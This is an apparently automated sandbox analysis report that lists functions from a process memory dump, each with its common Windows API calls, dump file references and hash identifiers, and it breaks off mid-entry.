Opcode Fuzzy Hash: 40dcd38b6126bba2bdf28cbbf49bf5d0dfe94b76dc1c8009f26cad7e8743dce4
Instruction Fuzzy Hash: 23018671E04308BFCB11EF7A9C4249EB7E8DB5E718751457BF809E3681EA385D10459C

Uniqueness

Uniqueness Score: -1.00%

Function 004ACFA4, Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,004AD003), ref: 004ACFDD
GetLastError.KERNEL32(00000000,00000000,00000000,004AD003), ref: 004ACFE5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: afdc86d441679bcb250b81918ffd40fa8a6a85cb49793413baf7553182217538
Instruction ID: 78a90aed5d61c595d9e7cc36cabfc332a8f811876a5a55e0602512ffd90581c8
Opcode Fuzzy Hash: afdc86d441679bcb250b81918ffd40fa8a6a85cb49793413baf7553182217538
Instruction Fuzzy Hash: 12F0C831E08208BFDB11DF759C4159EB7E8DB0A318F5145B7F805E3681EA394E015698

Uniqueness

Uniqueness Score: -1.00%

Function 004AD13C, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,004AD199,?,?,?,?,?,?,?,?,?,?,004B6184,00000000,004B62D8), ref: 004AD173
GetLastError.KERNEL32(00000000,00000000,004AD199,?,?,?,?,?,?,?,?,?,?,004B6184,00000000,004B62D8), ref: 004AD17B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: ecd4ea5eb32dad88567bdcff1c9705804462c046486e3b24e5a66aa0a17d47f1
Instruction ID: fada9f75f5d46744ff166ff1eb3387bf1aa3b7e01ab9fd3244394715a0c2f296
Opcode Fuzzy Hash: ecd4ea5eb32dad88567bdcff1c9705804462c046486e3b24e5a66aa0a17d47f1
Instruction Fuzzy Hash: 7EF0C831E04308AFDB01EB759C4149DB3E8DB4A71479149BBF805E3781EA3C5D104698

Uniqueness

Uniqueness Score: -1.00%

Function 004AD648, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(00000000,00000000,004AD6A5,?,?), ref: 004AD67F
GetLastError.KERNEL32(00000000,00000000,004AD6A5,?,?), ref: 004AD687

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 1efc10c41cdde54fc9ef5604848f0ceffb7946df6dc08f05c4d0363e9bfe1d63
Instruction ID: c606c186da66a0fe5591713a000fee8cc24042f3939372258aab45a51535bacf
Opcode Fuzzy Hash: 1efc10c41cdde54fc9ef5604848f0ceffb7946df6dc08f05c4d0363e9bfe1d63
Instruction Fuzzy Hash: 58F0C271E04208AFCB01EFB59C4149EB3E8DB5A71875145BBF809E3A81EA7D5E10469C

Uniqueness

Uniqueness Score: -1.00%

Function 00409620, Relevance: 3.0, APIs: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 00409644
GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d61bc043881c8c6bfe79b771c95475ab84ff338248c778fc4aa88fc9623a2036
Instruction ID: c89d22e9b9c93429c76f39329f2b2da4a35d652da9e9d6d2370a618858152621
Opcode Fuzzy Hash: d61bc043881c8c6bfe79b771c95475ab84ff338248c778fc4aa88fc9623a2036
Instruction Fuzzy Hash: 76F09630304608BFD701DA65CC52E6F779CDB8D714F910877F800B72C2D6796E008968

Uniqueness

Uniqueness Score: -1.00%

Function 0040D60C, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?), ref: 0040D62E
GetLastError.KERNEL32(?,?,?), ref: 0040D63C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: dc10f559586943bda1ce16f63495c456caee61bc11ef98b81be7e4bf19117496
Instruction ID: 8f2e7da0e97f8337a3b2c3b0fbafb6ab2ee7d7bceb159f38829ec2f690e29d78
Opcode Fuzzy Hash: dc10f559586943bda1ce16f63495c456caee61bc11ef98b81be7e4bf19117496
Instruction Fuzzy Hash: DBF0BD76905208AFDB10DEA998818DEB7BCEA48230F204266A964E33C1E6319E40DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00413C38, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
LoadLibraryW.KERNEL32(00000000,00000000,00413C8C,?,00000000,00413CAA,?,00008000,?), ref: 00413C71

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 22cdac0ea3864d1c9fc14794b3611bfb054c473a339b1bdcfc5bbffd66b44375
Instruction ID: c33b5ee54a125df8a5f962db831c7c4dc245aa6e85e185c06cca69ab3386a9d6
Opcode Fuzzy Hash: 22cdac0ea3864d1c9fc14794b3611bfb054c473a339b1bdcfc5bbffd66b44375
Instruction Fuzzy Hash: 6EF08975514744BEDF019F768C5245ABBECE709B0575344B6F800A2991F53C4910C664

Uniqueness

Uniqueness Score: -1.00%

Function 0047BF28, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0047BF58
SetWindowTextW.USER32(?,00000000), ref: 0047BF6E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: cc630a67aeced55246b47f80a926e095c4216094bd560cf0a947ee2c7436e7f5
Instruction ID: 7d00a6810dcca363eae9ffb52ff6539818c34ce04cf4287199015802695cfbf5
Opcode Fuzzy Hash: cc630a67aeced55246b47f80a926e095c4216094bd560cf0a947ee2c7436e7f5
Instruction Fuzzy Hash: 46F03760704614AADB12EA794885BD62298AF08704F48C0B7FD4CDF39BCB7D885747AE

Uniqueness

Uniqueness Score: -1.00%

Function 00412448, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(00508CC8,00000001,00000000), ref: 00412458
CloseHandle.KERNEL32(00000000,00508CC8,00000001,00000000,?,00508DCC,004124A8,00508DCC,00000000,00508DC8,00000000,?,00414DBE,00000000,00414F11), ref: 00412465

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCompareExchangeHandleInterlocked
String ID:
API String ID: 190309047-0
Opcode ID: 51956ae1cc8609e61d3e7c0644a64dcaa25e40099841b687f605e73589c61ff4
Instruction ID: f86636bed3fe7bc631094546bad7981a846863a83c1522cd9cb3cf0a8048f62e
Opcode Fuzzy Hash: 51956ae1cc8609e61d3e7c0644a64dcaa25e40099841b687f605e73589c61ff4
Instruction Fuzzy Hash: F0D0A7B2A5173137DE2112695DC1FE7014C8B5475DF008427BE54EA283D1DDCC9142E8

Uniqueness

Uniqueness Score: -1.00%

Function 0042E82C, Relevance: 3.0, APIs: 2, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegFlushKey.ADVAPI32(00000000,?,0042E898,?,?,00000000,0042EA5B,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0042E83D
RegCloseKey.ADVAPI32(00000000,?,0042E898,?,?,00000000,0042EA5B,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0042E846

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFlush
String ID:
API String ID: 320916635-0
Opcode ID: 44356deacde61a0b5a2f409bc4c365ed8b7f8d83cf359e99358833977f3b313a
Instruction ID: a75c305c6264e109eefdb3ee3159a7ab521904fd26116d3b11111d4de8dffc1f
Opcode Fuzzy Hash: 44356deacde61a0b5a2f409bc4c365ed8b7f8d83cf359e99358833977f3b313a
Instruction Fuzzy Hash: 2EE0EC607042018BDF54EE7685C560766D85B08304B48C4ABA908DF28BDA78C8048B24

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE84, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000FC), ref: 0042BE8B
DestroyWindow.USER32(00000000,00000000,000000FC,?,?,004B2092,004FDD69), ref: 0042BE93

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DestroyLong
String ID:
API String ID: 2871862000-0
Opcode ID: bce059e2e4f78d9ea124644dc8f52c56365baf76b2a7ddb240b69cd998c2f22f
Instruction ID: 93658432f59506ad1e570a0202503e38594b708589f4a020ba05f7c75e81cbd9
Opcode Fuzzy Hash: bce059e2e4f78d9ea124644dc8f52c56365baf76b2a7ddb240b69cd998c2f22f
Instruction Fuzzy Hash: ECC0125132213026DA10316A3CC28EF124CC8863793A0023BFA20A62D3CB2C4D4002EE

Uniqueness

Uniqueness Score: -1.00%

Function 0041390A, Relevance: 2.5, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00413998: GetCurrentThreadId.KERNEL32 ref: 004139A3

CloseHandle.KERNEL32(?), ref: 0041392E
CloseHandle.KERNEL32(?,?), ref: 00413937

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CurrentThread
String ID:
API String ID: 1015134532-0
Opcode ID: a2fdad8914ecd5c6f4cc98abce744b661157aaa3183f227c49fa47ef9d0192d2
Instruction ID: 6781cd22ff441573f1818a16e4e20f335c16569035c1fb7afbcb37892049e605
Opcode Fuzzy Hash: a2fdad8914ecd5c6f4cc98abce744b661157aaa3183f227c49fa47ef9d0192d2
Instruction Fuzzy Hash: 64E048A2710A2017C210B67D9D8645E53949F8566D304093EB780FB3D2D73CDD46439D

Uniqueness

Uniqueness Score: -1.00%

Function 00471BB0, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

FlatSB_SetScrollInfo.COMCTL32(00000000,0000001C,0000001C,000000FF,?,?,?), ref: 00471C73

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FlatInfoScroll
String ID:
API String ID: 3347635785-0
Opcode ID: 0b8e56398f003af2e37094571e4d2350b2c0b456a7a3a603069d487ec9884b64
Instruction ID: 504ac3d58b6b0d1a76c6eb64e7d17d5e211bc9fec583fb1852865caf7763fc92
Opcode Fuzzy Hash: 0b8e56398f003af2e37094571e4d2350b2c0b456a7a3a603069d487ec9884b64
Instruction Fuzzy Hash: AF418874A041448FD764CFADC080E9ABBF2AF58300F2485AEE488D7362D239EA04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00443558, Relevance: 1.6, APIs: 1, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A124: CreateWindowExW.USER32 ref: 0040A163

SendMessageW.USER32(00000000,000000CF,00000001,00000000), ref: 004435DC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMessageSendWindow
String ID:
API String ID: 304178485-0
Opcode ID: 573815f196507e6d036a7a0ecdccbab3dd7e1bd8fd436307ee9a42e3f2bce8ce
Instruction ID: e11c52fda4a27f151a50197d1ac5bd46fc7fc6e0f52adff070f030d935c3b23c
Opcode Fuzzy Hash: 573815f196507e6d036a7a0ecdccbab3dd7e1bd8fd436307ee9a42e3f2bce8ce
Instruction Fuzzy Hash: 9031E7B2200200AFEB55CF5DD8C1F6777EDEB48700F5584A9BA09CB296D678ED14CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00469970, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,00469A4B,?,?,?,?,?,?,0045E76F,00000001,00000000,00000000), ref: 00469A1E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 3a561c3a29907f50821656d42ea964113cf6dca45ace4f921fe87d9dd1b3d9ce
Instruction ID: 33dd6183825d76350a8a11f92c63a114718b24044ad024c6769659ae42eb07a6
Opcode Fuzzy Hash: 3a561c3a29907f50821656d42ea964113cf6dca45ace4f921fe87d9dd1b3d9ce
Instruction Fuzzy Hash: 8B313A35704244EFDB04CF58D594A9ABBFAEF88310F29C1A9E8088B356DB74ED05DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00432310, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetTextExtentPoint32W.GDI32(?,00000000,004323C4), ref: 00432382

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExtentPoint32Text
String ID:
API String ID: 223599850-0
Opcode ID: 0339d6e6d06f94b1f9b860f2cf8d81d642ce8b90d984b9213f8a1dcf832adc0e
Instruction ID: 9df5d263503c5acf0a2033159487fd57d49a2b3d111e6d372258474622ef1580
Opcode Fuzzy Hash: 0339d6e6d06f94b1f9b860f2cf8d81d642ce8b90d984b9213f8a1dcf832adc0e
Instruction Fuzzy Hash: 53115B70600614AFDB11DB7ADA8295AB7ECEB4D714751447AB804E3651E7B8AE00CA28

Uniqueness

Uniqueness Score: -1.00%

Function 004230E4, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,00000000,0000000A,?,108B0050,00000000,00423381,?,004232B0,00000000,004232C8,?,0000FFA6,00000000,00000000), ref: 00423106

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: 8185a077245d37cbe22f8d035410122bef49fceb3b2227ad57302fe8e657a3e0
Instruction ID: 4a3a1da4f905cbffce5b1b6ee0bf98fadfa2f2fcfee68d73e4c187ddbaafb2a9
Opcode Fuzzy Hash: 8185a077245d37cbe22f8d035410122bef49fceb3b2227ad57302fe8e657a3e0
Instruction Fuzzy Hash: 3901F271304310AFD710EF6AEC9293AB7EDEB89714792403AF604D7391DA7A9C169628

Uniqueness

Uniqueness Score: -1.00%

Function 004AA208, Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000435,00000000,7FFFFFFE), ref: 004AA263

Memory Dump Source

